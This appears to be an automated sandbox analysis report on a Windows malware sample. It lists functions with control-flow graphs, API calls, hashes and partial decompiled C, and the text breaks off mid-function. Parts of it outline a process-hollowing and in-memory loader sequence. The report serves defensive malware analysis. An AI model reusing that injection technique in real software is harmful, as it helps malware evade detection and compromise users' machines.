        • Opcode ID: e8f09c4807e8781d514f37eb2fb4b0ae164b850d9c5a277ad9807b65e9ea380f
        • Instruction ID: 14f904f24e09a44563244aae23fdd1d2f679eb90983097f1245eff154fe88aa0
        • Opcode Fuzzy Hash: e8f09c4807e8781d514f37eb2fb4b0ae164b850d9c5a277ad9807b65e9ea380f
        • Instruction Fuzzy Hash:
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00D01FB5 Relevance: 14.6, APIs: 9, Instructions: 1075memoryCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 12 d01fb5-d02e1b call d04ab5 15 d02e2b-d02e30 12->15 16 d02e1d-d02e29 call d04ab5 12->16 17 d03335-d0333a 15->17 16->15 20 d02e35-d0301c call d00005 VirtualAlloc * 8 call d01f65 * 8 call d046c5 * 2 call d04ab5 16->20 45 d0302c-d03043 call d046c5 20->45 46 d0301e-d03023 call d04ab5 20->46 51 d03046-d03052 call d04c15 45->51 49 d03028-d0302a 46->49 49->45 49->51 54 d03063-d0306f call d04c15 51->54 55 d03054-d0305e call d04c15 call d01e75 51->55 61 d03071-d03083 call d01635 54->61 62 d030cd-d030e3 54->62 55->54 65 d03088-d03095 61->65 66 d030e5-d030e7 62->66 67 d030ec-d030f8 call d04c15 62->67 65->62 68 d03097-d030a3 call d04ab5 65->68 66->17 73 d03132-d0313e call d04c15 67->73 74 d030fa-d0312d call d046c5 call d00265 67->74 68->62 75 d030a5-d030b1 call d04ab5 68->75 83 d03140-d03158 call d046c5 73->83 84 d03178-d03184 call d04c15 73->84 90 d032c0-d032e1 call d01f15 74->90 75->62 82 d030b3-d030ca call d046c5 75->82 82->62 92 d0315d-d03173 call d00265 83->92 95 d03186-d031b9 call d046c5 call d00265 84->95 96 d031be-d031ca call d04c15 84->96 102 d032ec-d032f0 90->102 92->90 95->90 107 d03204-d03210 call d04c15 96->107 108 d031cc-d031ff call d046c5 call d00265 96->108 105 d032f2-d0330c call d01985 102->105 106 d03328-d03330 ExitProcess 102->106 114 d03311-d03314 105->114 106->17 120 d03212-d03245 call d046c5 call d00265 107->120 121 d03247-d03253 call d04c15 107->121 108->90 117 d03316 114->117 118 d03318-d0331c 114->118 117->106 123 d03326 118->123 124 d0331e 118->124 120->90 130 d03255-d03288 call d046c5 call d00265 121->130 131 d0328a-d032bb call d046c5 call d00265 121->131 123->102 124->123 130->90 131->90
        APIs
        • VirtualAlloc.KERNELBASE(00000000,00000002,00003000,00000004,E84126B8,388F3ADB), ref: 00D02E5B
        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00D02E71
        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00D02E87
        • VirtualAlloc.KERNELBASE(00000000,00000001,00003000,00000004), ref: 00D02E9B
        • VirtualAlloc.KERNELBASE(00000000,00000001,00003000,00000004), ref: 00D02EAF
        • VirtualAlloc.KERNELBASE(00000000,0000003C,00003000,00000004), ref: 00D02EC3
        • VirtualAlloc.KERNELBASE(00000000,00000001,00003000,00000004), ref: 00D02ED7
        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00D02EED
          • Part of subcall function 00D046C5: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00003000,VirtualAlloc,00003000,VirtualFree,00000000), ref: 00D04863
        • ExitProcess.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6B68C4C6), ref: 00D0332A
        Memory Dump Source
        • Source File: 00000000.00000002.269168079.0000000000D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_d00000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: AllocVirtual$ExitProcess
        • String ID:
        • API String ID: 2301755047-0
        • Opcode ID: c8ee65299836c68aca4ffeeb21d0863f818415c9a351e9db538496d913c3f3ce
        • Instruction ID: ac8bd54dad2658fb530f6a316e94d665f15dd09a927c0997731e48b21d1e8ff2
        • Opcode Fuzzy Hash: c8ee65299836c68aca4ffeeb21d0863f818415c9a351e9db538496d913c3f3ce
        • Instruction Fuzzy Hash: D7A23620A14658D6EB20DF60DC55BDE7236EF68700F1050E9A20DEB3E1E77A5F81CB5A
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00D046C5 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 212memoryCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 141 d046c5-d0486d call d04135 call d04175 * 4 VirtualAlloc 153 d04877-d0487b 141->153 154 d0486f-d04872 141->154 156 d04895-d048a7 call d04135 call d049a5 153->156 157 d0487d-d04893 call d049a5 153->157 155 d04999-d0499c 154->155 165 d048a9-d048af 156->165 157->165 166 d048b1-d048b4 165->166 167 d048b9-d048f0 165->167 166->155 168 d048fe-d04908 167->168 169 d04938-d04996 CallWindowProcW VirtualFree 168->169 170 d0490a-d04936 168->170 169->155 170->168
        APIs
        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00003000,VirtualAlloc,00003000,VirtualFree,00000000), ref: 00D04863
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.269168079.0000000000D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_d00000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: AllocVirtual
        • String ID: CallWindowProcW$LoadLibraryW$VirtualAlloc$VirtualFree
        • API String ID: 4275171209-840194956
        • Opcode ID: db5a3faaeca2214f847324c64107c7e948738704fc90c88045da66bf3d03da6a
        • Instruction ID: 937e469ea7efb9c9847788d163f5de056484bab8793757d74943dfe30e2e4b9b
        • Opcode Fuzzy Hash: db5a3faaeca2214f847324c64107c7e948738704fc90c88045da66bf3d03da6a
        • Instruction Fuzzy Hash: E4A12A70D082C8DAEB11CBE8C448BEDBFB2AF25704F144199E1847B382D7BA5554CB76
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00D03345 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 172 d03345-d033f3 call d00005 175 d033fa-d03420 call d04405 CreateFileW 172->175 178 d03422 175->178 179 d03427-d03437 175->179 180 d03569-d0356d 178->180 186 d03439 179->186 187 d0343e-d03455 VirtualAlloc 179->187 181 d035a9-d035ac 180->181 182 d0356f-d03573 180->182 188 d035af-d035b6 181->188 184 d03575-d03578 182->184 185 d0357c-d03580 182->185 184->185 191 d03590-d03594 185->191 192 d03582-d0358c 185->192 186->180 193 d03457 187->193 194 d0345c-d03473 ReadFile 187->194 189 d035b8-d035c3 188->189 190 d0360b-d03620 188->190 195 d035c5 189->195 196 d035c7-d035d3 189->196 197 d03630-d03638 190->197 198 d03622-d0362d VirtualFree 190->198 199 d035a4 191->199 200 d03596-d035a0 191->200 192->191 193->180 201 d03475 194->201 202 d0347a-d034b7 VirtualAlloc 194->202 195->190 205 d035d5-d035e5 196->205 206 d035e7-d035f3 196->206 198->197 199->181 200->199 201->180 203 d034b9 202->203 204 d034be-d034d9 call d04655 202->204 203->180 212 d034e4-d034ee 204->212 208 d03609 205->208 209 d03600-d03606 206->209 210 d035f5-d035fe 206->210 208->188 209->208 210->208 213 d034f0-d0351f call d04655 212->213 214 d03521-d03535 call d04465 212->214 213->212 220 d03537 214->220 221 d03539-d0353d 214->221 220->180 222 d03546-d0354a 221->222 223 d0353f-d03543 FindCloseChangeNotification 221->223 224 d0355a-d03563 222->224 225 d0354c-d03557 VirtualFree 222->225 223->222 224->175 224->180 225->224
        APIs
        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00D03416
        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00D0362D
        Memory Dump Source
        • Source File: 00000000.00000002.269168079.0000000000D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_d00000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: CreateFileFreeVirtual
        • String ID:
        • API String ID: 204039940-0
        • Opcode ID: 1b514a202ce007281f84b9962a7ae5b6aa93391a19764c4e7429361d82933d36
        • Instruction ID: 08af23fe6aeb5e7b7c7c08f6ac17dbbc7221ddb7d8edcb2cd8062d94e2b7d7ea
        • Opcode Fuzzy Hash: 1b514a202ce007281f84b9962a7ae5b6aa93391a19764c4e7429361d82933d36
        • Instruction Fuzzy Hash: FEA10574E00208EBDB14CFD4C899BEEBBB9BF48304F248159E605BB2D0D7759A41CB64
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00D01985 Relevance: 7.9, APIs: 5, Instructions: 416processthreadCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 226 d01985-d01a85 call d04635 * 3 233 d01a87-d01a91 226->233 234 d01a9c 226->234 233->234 235 d01a93-d01a9a 233->235 236 d01aa3-d01aa9 234->236 235->236 237 d01ab0-d01ad7 CreateProcessW 236->237 239 d01ad9 237->239 240 d01ade-d01af8 GetThreadContext 237->240 241 d01e1f-d01e23 239->241 242 d01afa 240->242 243 d01aff-d01b1a ReadProcessMemory 240->243 244 d01e25-d01e29 241->244 245 d01e6a 241->245 242->241 246 d01b21-d01b2a 243->246 247 d01b1c 243->247 249 d01e3b-d01e3f 244->249 250 d01e2b-d01e37 244->250 248 d01e6f-d01e72 245->248 251 d01b53-d01b6f call d03ad5 246->251 252 d01b2c-d01b3b 246->252 247->241 254 d01e41-d01e44 249->254 255 d01e48-d01e4c 249->255 250->249 263 d01b71 251->263 264 d01b76-d01b99 call d03c15 251->264 252->251 256 d01b3d-d01b4c call d03a35 252->256 254->255 260 d01e55-d01e59 255->260 261 d01e4e-d01e51 255->261 256->251 267 d01b4e 256->267 265 d01e66-d01e68 260->265 266 d01e5b-d01e61 call d03a35 260->266 261->260 263->241 271 d01be0-d01c01 call d03c15 264->271 272 d01b9b-d01b9f 264->272 265->248 266->265 267->241 278 d01c03 271->278 279 d01c08-d01c23 call d04655 271->279 274 d01ba1-d01bd2 call d03c15 272->274 275 d01bdb 272->275 282 d01bd4 274->282 283 d01bd9 274->283 275->241 278->241 285 d01c2e-d01c38 279->285 282->241 283->271 286 d01c3a-d01c69 call d04655 285->286 287 d01c6b-d01c6f 285->287 286->285 289 d01c75-d01c85 287->289 290 d01d5a-d01d77 call d03645 287->290 289->290 293 d01c8b-d01c9b 289->293 298 d01d79 290->298 299 d01d7e-d01d9d SetThreadContext 290->299 293->290 294 d01ca1-d01cc5 293->294 297 d01cc8-d01ccc 294->297 297->290 300 d01cd2-d01ce7 297->300 298->241 301 d01da1-d01dac call d03975 299->301 302 d01d9f 299->302 304 d01cfb-d01cff 300->304 308 d01db0-d01ddc call d046c5 301->308 309 d01dae 301->309 302->241 306 d01d01-d01d0d 304->306 307 d01d3d-d01d55 304->307 310 d01d3b 306->310 311 d01d0f-d01d39 306->311 307->297 315 d01de5-d01de9 308->315 316 d01dde-d01de2 FindCloseChangeNotification 308->316 309->241 310->304 311->310 317 d01df2-d01df6 315->317 318 d01deb-d01dee 315->318 316->315 319 d01df8-d01dfb 317->319 320 d01dff-d01e03 317->320 318->317 319->320 321 d01e10-d01e19 320->321 322 d01e05-d01e0b call d03a35 320->322 321->237 321->241 322->321
        APIs
        • CreateProcessW.KERNELBASE(00000001,00000000), ref: 00D01AD2
        • GetThreadContext.KERNELBASE(?,00010007), ref: 00D01AF3
        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D01B15
        Memory Dump Source
        • Source File: 00000000.00000002.269168079.0000000000D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_d00000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: Process$ContextCreateMemoryReadThread
        • String ID:
        • API String ID: 2411489757-0
        • Opcode ID: 9921dd2f7bf092e1c61bebf1fceb29305424721e60a52d569aa8cd8431c28301
        • Instruction ID: d1f58f8dbd91554bca306f56ab62f0f56f48c5a6d4e9e06bbd3fddbda8ffc669
        • Opcode Fuzzy Hash: 9921dd2f7bf092e1c61bebf1fceb29305424721e60a52d569aa8cd8431c28301
        • Instruction Fuzzy Hash: 6F021874A00208EBDB18CF98C985FEEB7B6FF48704F248158E619AB2C5D774E941CB64
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00266A69 Relevance: 3.1, APIs: 2, Instructions: 67COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 324 266a69-266a6e 325 266a70-266a88 324->325 326 266a96-266a9f 325->326 327 266a8a-266a8e 325->327 329 266ab1 326->329 330 266aa1-266aa4 326->330 327->326 328 266a90-266a94 327->328 331 266b11-266b15 328->331 334 266ab3-266ac0 GetStdHandle 329->334 332 266aa6-266aab 330->332 333 266aad-266aaf 330->333 331->325 335 266b1b-266b1e 331->335 332->334 333->334 336 266ac2-266ac4 334->336 337 266acf 334->337 336->337 338 266ac6-266acd GetFileType 336->338 339 266ad1-266ad3 337->339 338->339 340 266ad5-266ae0 339->340 341 266af3-266b05 339->341 343 266ae2-266ae6 340->343 344 266ae8-266aeb 340->344 341->331 342 266b07-266b0a 341->342 342->331 343->331 344->331 345 266aed-266af1 344->345 345->331
        C-Code - Quality: 84%
        			E00266A69() {
				signed int _t20;
				signed int _t22;
				long _t23;
				signed int _t25;
				void* _t28;
				signed int _t31;
				void* _t33;

				_t31 = 0;
				do {
					_t20 = _t31 & 0x0000003f;
					_t33 = _t20 * 0x30 +  *((intOrPtr*)(0x273f60 + (_t31 >> 6) * 4));
					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
						 *(_t33 + 0x28) = 0x81;
						_t22 = _t31;
						if(_t22 == 0) {
							_push(0xfffffff6);
						} else {
							if(_t22 == 1) {
								_push(0xfffffff5);
							} else {
								_push(0xfffffff4);
							}
						}
						_pop(_t23);
						_t28 = GetStdHandle(_t23);
						if(_t28 == 0xffffffff || _t28 == 0) {
							_t25 = 0;
						} else {
							_t25 = GetFileType(_t28); // executed
						}
						if(_t25 == 0) {
							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							 *(_t33 + 0x18) = 0xfffffffe;
							_t20 =  *0x274194;
							if(_t20 != 0) {
								_t20 =  *(_t20 + _t31 * 4);
								 *(_t20 + 0x10) = 0xfffffffe;
							}
						} else {
							_t20 = _t25 & 0x000000ff;
							 *(_t33 + 0x18) = _t28;
							if(_t20 != 2) {
								if(_t20 == 3) {
									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
								}
							} else {
								 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							}
						}
					} else {
						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
					}
					_t31 = _t31 + 1;
				} while (_t31 != 3);
				return _t20;
			}










        0x00266a6e
        0x00266a70
        0x00266a74
        0x00266a7d
        0x00266a88
        0x00266a98
        0x00266a9c
        0x00266a9f
        0x00266ab1
        0x00266aa1
        0x00266aa4
        0x00266aad
        0x00266aa6
        0x00266aa6
        0x00266aa8
        0x00266aa4
        0x00266ab3
        0x00266abb
        0x00266ac0
        0x00266acf
        0x00266ac6
        0x00266ac7
        0x00266ac7
        0x00266ad3
        0x00266af3
        0x00266af7
        0x00266afe
        0x00266b05
        0x00266b07
        0x00266b0a
        0x00266b0a
        0x00266ad5
        0x00266ad5
        0x00266ada
        0x00266ae0
        0x00266aeb
        0x00266aed
        0x00266aed
        0x00266ae2
        0x00266ae2
        0x00266ae2
        0x00266ae0
        0x00266a90
        0x00266a90
        0x00266a90
        0x00266b11
        0x00266b12
        0x00266b1e

        APIs
        • GetStdHandle.KERNEL32(000000F6), ref: 00266AB5
        • GetFileType.KERNELBASE(00000000), ref: 00266AC7
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: FileHandleType
        • String ID:
        • API String ID: 3000768030-0
        • Opcode ID: a9ff9162e4d6951832b375df1fa78de665f8756ba0747dffbe668beb48bfcadb
        • Instruction ID: b83619fccbe7032395169eaa3195e074bf36dfea1d15cb08150c3bd468dd5f3f
        • Opcode Fuzzy Hash: a9ff9162e4d6951832b375df1fa78de665f8756ba0747dffbe668beb48bfcadb
        • Instruction Fuzzy Hash: 131106316347439AD7308E7E9C8C622BA949B96330F38471AD5B6E61F1CB70DDE29241
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0026479B Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 434 26479b-2647a6 435 2647b4-2647ba 434->435 436 2647a8-2647b2 434->436 438 2647d3-2647e4 RtlAllocateHeap 435->438 439 2647bc-2647bd 435->439 436->435 437 2647e8-2647f3 call 26501f 436->437 443 2647f5-2647f7 437->443 440 2647e6 438->440 441 2647bf-2647c6 call 2640a1 438->441 439->438 440->443 441->437 447 2647c8-2647d1 call 2674c4 441->447 447->437 447->438
        C-Code - Quality: 95%
        			E0026479B(void* __ecx, signed int _a4, signed int _a8) {
				void* __esi;
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t16;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x274170, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E002640A1();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E0026501F())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E002674C4(_t15, _t16, _t19, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				_t16 = _t13 % _t18;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}











        0x0026479b
        0x002647a1
        0x002647a6
        0x002647b4
        0x002647b4
        0x002647ba
        0x002647bc
        0x002647bc
        0x002647d3
        0x002647dc
        0x002647e4
        0x00000000
        0x00000000
        0x002647c4
        0x002647c6
        0x002647e8
        0x002647ed
        0x002647f3
        0x00000000
        0x002647f3
        0x002647c9
        0x002647ce
        0x002647cf
        0x002647d1
        0x00000000
        0x00000000
        0x002647d1
        0x00000000
        0x002647d3
        0x002647ac
        0x002647ad
        0x002647b2
        0x00000000
        0x00000000
        0x00000000

        APIs
        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00264CFF,00000001,00000364,?,00267370,?,00000004,00000000,?,?,?,0026437B), ref: 002647DC
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: 2a648ca2aeb5940898c7fdecbcf5b07489256e973de24d8af121c1e9e692b9f4
        • Instruction ID: 4ca1fbd64708df269f909bdd3f32f0a19e1992259ec519c1e7f3fe264af29bc6
        • Opcode Fuzzy Hash: 2a648ca2aeb5940898c7fdecbcf5b07489256e973de24d8af121c1e9e692b9f4
        • Instruction Fuzzy Hash: BBF0E035534135A79B237E219C05B57BB8C9F42770F158112AC45DB5C1CB60DCF185F0
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        Function 00264D99 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
        Download Yara Rule
        C-Code - Quality: 76%
        			E00264D99(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0x273018; // 0x16a19189
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00262747(_t41);
					_pop(_t62);
				}
				E00262CE0(_t67,  &_v804, 0, 0x50);
				E00262CE0(_t67,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E00262747(_t57);
				}
				return E002629BB(_v8 ^ _t70);
			}




































        0x00264d99
        0x00264d99
        0x00264d99
        0x00264d99
        0x00264da4
        0x00264da9
        0x00264dab
        0x00264db3
        0x00264db5
        0x00264db8
        0x00264dbd
        0x00264dbd
        0x00264dc9
        0x00264ddc
        0x00264dea
        0x00264df0
        0x00264df6
        0x00264dfc
        0x00264e02
        0x00264e08
        0x00264e0e
        0x00264e14
        0x00264e1a
        0x00264e20
        0x00264e27
        0x00264e2e
        0x00264e35
        0x00264e3c
        0x00264e43
        0x00264e4a
        0x00264e4b
        0x00264e54
        0x00264e5a
        0x00264e5d
        0x00264e63
        0x00264e70
        0x00264e79
        0x00264e82
        0x00264e8b
        0x00264e99
        0x00264e9b
        0x00264eb0
        0x00264ebc
        0x00264ebf
        0x00264ec4
        0x00264ed3

        APIs
        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00264E91
        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00264E9B
        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00264EA8
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: ExceptionFilterUnhandled$DebuggerPresent
        • String ID:
        • API String ID: 3906539128-0
        • Opcode ID: 156f4e04d5d5f713aa195b2498d2d7d7e584f4c8668883a5da9effad880ead74
        • Instruction ID: 6dba87d7f5988150ffe97fdea362ecff912699b638a221d0c5d2060c6f927fc3
        • Opcode Fuzzy Hash: 156f4e04d5d5f713aa195b2498d2d7d7e584f4c8668883a5da9effad880ead74
        • Instruction Fuzzy Hash: B331A27491122DABCB21DF64DD89B8DBBB8BF08310F5042DAE81CA6250EB709B958F44
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00263E41 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
        Download Yara Rule
        C-Code - Quality: 100%
        			E00263E41(int _a4) {
				void* _t14;
				void* _t16;

				if(E0026666E(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00263E82(_t14, _t16, _a4);
				ExitProcess(_a4);
			}





        0x00263e4d
        0x00263e69
        0x00263e69
        0x00263e72
        0x00263e7b

        APIs
        • GetCurrentProcess.KERNEL32(00000003,?,00263E17,00000003,00271DE8,0000000C,00263F2A,00000003,00000002,00000000,?,0026479A,00000003), ref: 00263E62
        • TerminateProcess.KERNEL32(00000000,?,00263E17,00000003,00271DE8,0000000C,00263F2A,00000003,00000002,00000000,?,0026479A,00000003), ref: 00263E69
        • ExitProcess.KERNEL32 ref: 00263E7B
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: Process$CurrentExitTerminate
        • String ID:
        • API String ID: 1703294689-0
        • Opcode ID: f31c5546d564875db0e06bc5d16c02ed325e5de928041f1356f9c4b768c38380
        • Instruction ID: 2bec2746d834b899b9febcd200ac4aa292d98cfc0f35a1979e40f3d1872b236c
        • Opcode Fuzzy Hash: f31c5546d564875db0e06bc5d16c02ed325e5de928041f1356f9c4b768c38380
        • Instruction Fuzzy Hash: 70E0B631924148AFCF11AF69ED0DA593B69EF51741F148414F8058A122DBBADEA3CBA0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0026280B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
        Download Yara Rule
        C-Code - Quality: 86%
        			E0026280B(intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _t59;
				signed int _t62;
				signed int _t63;
				intOrPtr _t65;
				signed int _t66;
				signed int _t68;
				intOrPtr _t73;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t84;
				intOrPtr* _t86;
				signed int _t91;
				signed int _t94;

				_t84 = __edx;
				 *0x2737d4 =  *0x2737d4 & 0x00000000;
				 *0x273010 =  *0x273010 | 1;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L20:
					return 0;
				}
				_v24 = _v24 & 0x00000000;
				 *0x273010 =  *0x273010 | 0x00000002;
				 *0x2737d4 = 1;
				_t86 =  &_v48;
				_push(1);
				asm("cpuid");
				_pop(_t73);
				 *_t86 = 0;
				 *((intOrPtr*)(_t86 + 4)) = 1;
				 *((intOrPtr*)(_t86 + 8)) = 0;
				 *((intOrPtr*)(_t86 + 0xc)) = _t84;
				_v16 = _v48;
				_v8 = _v36 ^ 0x49656e69;
				_v12 = _v40 ^ 0x6c65746e;
				_push(1);
				asm("cpuid");
				_t75 =  &_v48;
				 *_t75 = 1;
				 *((intOrPtr*)(_t75 + 4)) = _t73;
				 *((intOrPtr*)(_t75 + 8)) = 0;
				 *((intOrPtr*)(_t75 + 0xc)) = _t84;
				if((_v44 ^ 0x756e6547 | _v8 | _v12) != 0) {
					L9:
					_t91 =  *0x2737d8; // 0x2
					L10:
					_v32 = _v36;
					_t59 = _v40;
					_v8 = _t59;
